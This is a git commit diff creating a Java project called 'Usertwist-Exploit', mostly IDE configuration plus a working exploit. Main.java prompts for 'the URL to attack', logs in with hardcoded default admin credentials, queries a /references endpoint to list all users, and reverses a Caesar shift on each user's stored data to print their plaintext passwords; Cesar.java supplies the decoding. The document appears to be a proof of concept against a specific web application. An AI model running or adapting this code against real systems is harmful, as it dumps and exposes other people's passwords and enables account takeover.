First commit

2024-08-01 10:33:22 +02:00
commit 41f7a3d095
10 changed files with 195 additions and 0 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1,29 @@
+### IntelliJ IDEA ###
+out/
+!**/src/main/**/out/
+!**/src/test/**/out/
+
+### Eclipse ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+bin/
+!**/src/main/**/bin/
+!**/src/test/**/bin/
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+
+### VS Code ###
+.vscode/
+
+### Mac OS ###
+.DS_Store
--- a/.idea/.gitignore
+++ b/.idea/.gitignore
@@ -0,0 +1,8 @@
+# Default ignored files
+/shelf/
+/workspace.xml
+# Editor-based HTTP Client requests
+/httpRequests/
+# Datasource local storage ignored files
+/dataSources/
+/dataSources.local.xml
--- a/.idea/inspectionProfiles/Project_Default.xml
+++ b/.idea/inspectionProfiles/Project_Default.xml
@@ -0,0 +1,8 @@
+<component name="InspectionProjectProfileManager">
+  <profile version="1.0">
+    <option name="myName" value="Project Default" />
+    <inspection_tool class="AutoCloseableResource" enabled="true" level="WARNING" enabled_by_default="true">
+      <option name="METHOD_MATCHER_CONFIG" value="java.util.Formatter,format,java.io.Writer,append,com.google.common.base.Preconditions,checkNotNull,org.hibernate.Session,close,java.io.PrintWriter,printf,java.io.PrintStream,printf,java.net.http.HttpClient,newHttpClient" />
+    </inspection_tool>
+  </profile>
+</component>
--- a/.idea/libraries/json.xml
+++ b/.idea/libraries/json.xml
@@ -0,0 +1,10 @@
+<component name="libraryTable">
+  <library name="json" type="repository">
+    <properties maven-id="org.json:json:20240303" />
+    <CLASSES>
+      <root url="jar://$MAVEN_REPOSITORY$/org/json/json/20240303/json-20240303.jar!/" />
+    </CLASSES>
+    <JAVADOC />
+    <SOURCES />
+  </library>
+</component>
--- a/.idea/misc.xml
+++ b/.idea/misc.xml
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectRootManager" version="2" languageLevel="JDK_21" default="true" project-jdk-name="21" project-jdk-type="JavaSDK">
+    <output url="file://$PROJECT_DIR$/out" />
+  </component>
+</project>
--- a/.idea/modules.xml
+++ b/.idea/modules.xml
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectModuleManager">
+    <modules>
+      <module fileurl="file://$PROJECT_DIR$/Usertwist-Exploit.iml" filepath="$PROJECT_DIR$/Usertwist-Exploit.iml" />
+    </modules>
+  </component>
+</project>
--- a/.idea/vcs.xml
+++ b/.idea/vcs.xml
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="VcsDirectoryMappings">
+    <mapping directory="$PROJECT_DIR$" vcs="Git" />
+  </component>
+</project>
--- a/Usertwist-Exploit.iml
+++ b/Usertwist-Exploit.iml
@@ -0,0 +1,12 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="JAVA_MODULE" version="4">
+  <component name="NewModuleRootManager" inherit-compiler-output="true">
+    <exclude-output />
+    <content url="file://$MODULE_DIR$">
+      <sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
+    </content>
+    <orderEntry type="inheritedJdk" />
+    <orderEntry type="sourceFolder" forTests="false" />
+    <orderEntry type="library" name="json" level="project" />
+  </component>
+</module>
--- a/src/fr/motysten/usertwist/exploit/Main.java
+++ b/src/fr/motysten/usertwist/exploit/Main.java
@@ -0,0 +1,74 @@
+package fr.motysten.usertwist.exploit;
+
+import fr.motysten.usertwist.exploit.tools.Cesar;
+import org.json.JSONArray;
+import org.json.JSONObject;
+
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStreamReader;
+import java.net.URI;
+import java.net.http.HttpClient;
+import java.net.http.HttpRequest;
+import java.net.http.HttpResponse;
+
+public class Main {
+
+    public static String link = "https://poc.athelas.fr";
+    public static String username = "admin";
+    public static String password = "AdminSecret1C";
+
+    public static void main(String[] args) throws IOException, InterruptedException {
+        BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
+
+        System.out.println("Usertwist exploit by Motysten");
+        String readLine;
+
+        System.out.println("Please enter the URL to attack (leave empty to use default) :");
+        readLine = reader.readLine();
+        if (!readLine.isEmpty()) {link = readLine;}
+
+        System.out.println("Please enter the used username (leave empty to use default) :");
+        readLine = reader.readLine();
+        if (!readLine.isEmpty()) {username = readLine;}
+
+        System.out.println("Please enter the password (leave empty to use default) :");
+        readLine = reader.readLine();
+        if (!readLine.isEmpty()) {password = readLine;}
+
+        HttpClient client = HttpClient.newHttpClient();
+
+        JSONObject requestJSON = new JSONObject();
+        requestJSON.put("username", username);
+        requestJSON.put("password", password);
+
+        HttpRequest request = HttpRequest.newBuilder(URI.create(link + "/login"))
+                .POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
+                .build();
+
+        HttpResponse<String> response = client.send(request, HttpResponse.BodyHandlers.ofString());
+        JSONObject responseObject = new JSONObject(response.body());
+        String token = responseObject.optString("token");
+
+        requestJSON = new JSONObject();
+        requestJSON.put("term", "");
+        requestJSON.put("entity", "users");
+
+        request = HttpRequest.newBuilder(URI.create(link + "/references"))
+                .POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
+                .setHeader("Authorization", "Bearer " + token)
+                .build();
+
+        response = client.send(request, HttpResponse.BodyHandlers.ofString());
+        JSONArray usersArray = new JSONArray(response.body());
+
+        for (int i = 0; i < usersArray.length(); i++) {
+            JSONObject user = usersArray.getJSONObject(i);
+            String login = user.getString("username");
+            String password = Cesar.cesarRotate(user.getString("data"), -4);
+
+            System.out.println(login + " => " + password);
+        }
+    }
+
+}
--- a/src/fr/motysten/usertwist/exploit/tools/Cesar.java
+++ b/src/fr/motysten/usertwist/exploit/tools/Cesar.java
@@ -0,0 +1,34 @@
+package fr.motysten.usertwist.exploit.tools;
+
+public class Cesar {
+
+    public static String cesarRotate(String input, int offset) {
+
+        String LOWER_ALPHABET = "abcdefghijklmnopqrstuvwxyz";
+        if (offset < 0) {
+            LOWER_ALPHABET = new StringBuilder(LOWER_ALPHABET).reverse().toString();
+            offset = -offset;
+        }
+        String UPPER_ALPHABET = LOWER_ALPHABET.toUpperCase();
+
+        StringBuilder output = new StringBuilder();
+
+
+        for (int i = 0; i < input.length(); i++) {
+            char newChar = input.charAt(i);
+            if (!Character.isDigit(input.charAt(i))) {
+                int pos = LOWER_ALPHABET.indexOf(Character.toLowerCase(input.charAt(i)));
+                int newPos = (pos + offset) % 26;
+                if (Character.isUpperCase(input.charAt(i))) {
+                    newChar = UPPER_ALPHABET.charAt(newPos);
+                } else {
+                    newChar = LOWER_ALPHABET.charAt(newPos);
+                }
+            }
+            output.append(newChar);
+        }
+
+        return output.toString();
+    }
+
+}